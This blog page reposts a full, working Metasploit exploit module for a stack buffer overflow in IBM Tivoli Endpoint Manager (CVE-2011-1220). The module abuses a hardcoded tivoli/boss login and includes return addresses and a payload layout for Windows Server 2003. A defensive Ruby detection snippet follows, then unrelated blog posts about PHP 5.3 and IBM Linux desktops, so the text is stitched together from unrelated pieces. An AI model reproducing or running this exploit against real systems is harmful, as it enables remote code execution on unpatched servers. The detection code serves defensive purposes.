IBM Tivoli Endpoint Manager POST Query Buffer Overflow


A little bit of overflow never hurt anyone:

##
# $Id: ibm_tivoli_endpoint_bof.rb 12925 2011-06-12 00:04:55Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Tivoli Endpoint Manager POST Query Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the way IBM Tivoli
Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query
arguments.

This issue can be triggered by sending a specially crafted HTTP POST request to
the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization
is required. This exploit makes use of a second vulnerability, a hardcoded account
(tivoli/boss) is used to bypass the authorization restriction.
},
'Author' =>
[
'bannedit', # metasploit module
'Jeremy Brown <0xjbrown[at]gmail.com>', # original public exploit
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12925 $',
'References' =>
[
[ 'CVE', '2011-1220'],
[ 'OSVDB', '72713'], # buffer overflow
[ 'OSVDB', '72751'], # hardcoded account
[ 'BID', '48049'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-169/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows Server 2003 SP0', { 'Ret' => 0x77d80787 }], # user32.dll - jmp esp
['Windows Server 2003 SP1', { 'Ret' => 0x77403680 }], # user32.dll - jmp esp
['Windows Server 2003 SP2', { 'Ret' => 0x77402680 }], # user32.dll - jmp esp
],
'DisclosureDate' => 'May 31 2011'))

register_options(
[
Opt::RPORT(9495),
], self.class )
end

def exploit
print_status("Trying target #{target.name}...")

auth = Rex::Text.encode_base64("tivoli:boss")
varname = rand_text_alpha(rand(10))

sploit = make_nops(1) * 256
sploit << [target.ret].pack('V')
sploit << payload.encoded

print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

res = send_request_cgi({
'uri' => '/addr',
'method' => 'POST',
'headers' =>
{
'Authorization' => "Basic #{auth}"
},
'vars_post' =>
{
varname => sploit,
},
}, 5)

handler
end
end

Source: http://www.exploit-db.com/exploits/17392/
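
For defenders, the two conditions the module description relies on (the hardcoded tivoli/boss account and an overlong POST argument) can both be checked in captured HTTP requests. The following is an added example, not part of the original post or of the Metasploit module; the helper names, the sample requests and the 256-byte threshold (taken from the padding length in the module) are assumptions.

```ruby
require 'uri'

# Hardcoded account named in the module description above.
HARDCODED_ACCOUNT = 'tivoli:boss'
# Assumption: the module pads 256 bytes before the return address, so any
# decoded POST value of 256 bytes or more is treated as suspicious.
MAX_VALUE_BYTES = 255

# Decoded byte length of one form value; malformed %-escapes fall back to raw.
def value_bytes(value)
  URI.decode_www_form_component(value.to_s).bytesize
rescue ArgumentError
  value.to_s.bytesize
end

# Inspect one raw HTTP request (hypothetical helper) and return findings.
def inspect_request(raw)
  head, body = raw.b.split(/\r?\n\r?\n/, 2)
  lines = head.to_s.split(/\r?\n/)
  verb = lines.shift.to_s.split(' ').first
  headers = lines.each_with_object({}) do |line, h|
    name, val = line.split(':', 2)
    h[name.strip.downcase] = val.strip if val
  end

  findings = []
  if (m = headers['authorization'].to_s.match(/\ABasic\s+(\S+)/i))
    # unpack1('m') is Base64 decoding without needing the base64 library.
    findings << :hardcoded_account if m[1].unpack1('m') == HARDCODED_ACCOUNT
  end
  if verb == 'POST'
    too_long = body.to_s.split('&').any? do |pair|
      value_bytes(pair.split('=', 2)[1]) > MAX_VALUE_BYTES
    end
    findings << :oversized_post_value if too_long
  end
  findings
end

# Constructed sample requests (not captured traffic).
def sample_request(creds, value)
  "POST /addr HTTP/1.1\r\nHost: endpoint.example:9495\r\n" \
    "Authorization: Basic #{[creds].pack('m0')}\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n\r\nq=#{value}"
end

SUSPICIOUS = sample_request(HARDCODED_ACCOUNT, 'A' * 300)
BENIGN = sample_request('operator:constructed-password', 'status')
```

Either finding on traffic to TCP port 9495 is worth an alert on its own; both together match the request shape the module sends.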

Hello world!


The term Hello World is interesting, because if you look at it, the person is being welcomed to the world… lol, not funny, is it? True, but it makes sense here in 2 situations:

Hello Nerd World and Hello Program World.

Welcome to our site of How Tos and “IT tales”.
Have fun or learn something interesting.

We promise How Tos about Networking, PHP, MySQL, Postgres, Windows, BSD and GNU/Linux, not to mention news about Apple, Sun, IBM and other “little monsters” of the IT market, such as Red Hat and “tiny” GOOGLE.

Thank you for visiting us.

What's new in PHP 5.3?

Every so often PHP developers ask themselves:

What's new in PHP 5.3?

Here is the answer, prepared by IBM in an interesting overview split into 2 parts (so far):

http://www.ibm.com/developerworks/opensource/library/os-php-5.3new1/?ca=dgr-lnxw07PHPv5.3P1&S_TACT=105AGX59&S_CMP=GRsitelnxw01
http://www.ibm.com/developerworks/opensource/library/os-php-5.3new2/index.html?ca=dgr-lnxw01os-php-5.3new2&S_TACT=105AGX59&S_CMP=GRsitelnxw01

Source: www.tinews.org

IBM launches Microsoft-Free Linux Virtual Desktop

Passing along the official note:

“According to Information Week, IBM has introduced a line of business computers that avoid Microsoft’s desktop environment in favor of open source software. IBM worked with Canonical and Virtual Bridges to create the platform, which IBM claims saves businesses $500 to $800 per user on software licenses and an additional $258 per user ‘since there is no need to upgrade hardware to support Vista and Office.'”

Source: http://www.cyberlinux.com.br